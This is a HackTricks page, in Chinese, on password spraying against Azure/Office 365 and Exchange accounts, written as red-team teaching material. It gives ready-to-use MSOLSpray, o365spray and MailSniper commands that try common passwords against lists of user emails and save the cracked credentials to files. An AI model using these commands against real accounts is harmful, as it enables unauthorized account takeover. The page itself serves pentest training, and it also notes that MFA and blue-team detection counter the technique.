Az - Password Spraying

学习并练习 AWS 黑客技术：HackTricks 培训 AWS 红队专家 (ARTE) 学习并练习 GCP 黑客技术：HackTricks 培训 GCP 红队专家 (GRTE)

支持 HackTricks

检查订阅计划!
加入 💬 Discord 群组 或 电报群组 或关注我们的 Twitter 🐦 @hacktricks_live.
通过向 HackTricks 和 HackTricks Cloud github 仓库提交 PR 来分享黑客技巧。

密码喷洒

在 Azure 中，可以针对 不同的 API 端点执行此操作，如 Azure AD Graph、Microsoft Graph、Office 365 Reporting webservice 等。

然而，请注意，这种技术非常喧闹，蓝队可以 轻松捕捉到它。此外，强制密码复杂性和使用 MFA 可能会使这种技术变得无效。

您可以使用 MSOLSpray 执行密码喷洒攻击。

. .\MSOLSpray\MSOLSpray.ps1
Invoke-MSOLSpray -UserList .\validemails.txt -Password Welcome2022! -Verbose

或者使用o365spray

python3 o365spray.py --spray -U validemails.txt -p 'Welcome2022!' --count 1 --lockout 1 --domain victim.com

或者使用MailSniper

#OWA
Invoke-PasswordSprayOWA -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Spring2021 -Threads 15 -OutFile owa-sprayed-creds.txt
#EWS
Invoke-PasswordSprayEWS -ExchHostname mail.domain.com -UserList .\userlist.txt -Password Spring2021 -Threads 15 -OutFile sprayed-ews-creds.txt
#Gmail
Invoke-PasswordSprayGmail -UserList .\userlist.txt -Password Fall2016 -Threads 15 -OutFile gmail-sprayed-creds.txt

学习并练习 AWS Hacking:HackTricks 培训 AWS 红队专家 (ARTE) 学习并练习 GCP Hacking: HackTricks 培训 GCP 红队专家 (GRTE)

支持 HackTricks

检查 订阅计划!
加入 💬 Discord 群组 或 telegram 群组 或关注我们的 Twitter 🐦 @hacktricks_live.
通过向 HackTricks 和 HackTricks Cloud github 仓库提交 PR 来分享黑客技巧。

PreviousAz - Device Code Authentication Phishing NextAz - Services

Last updated 1 month ago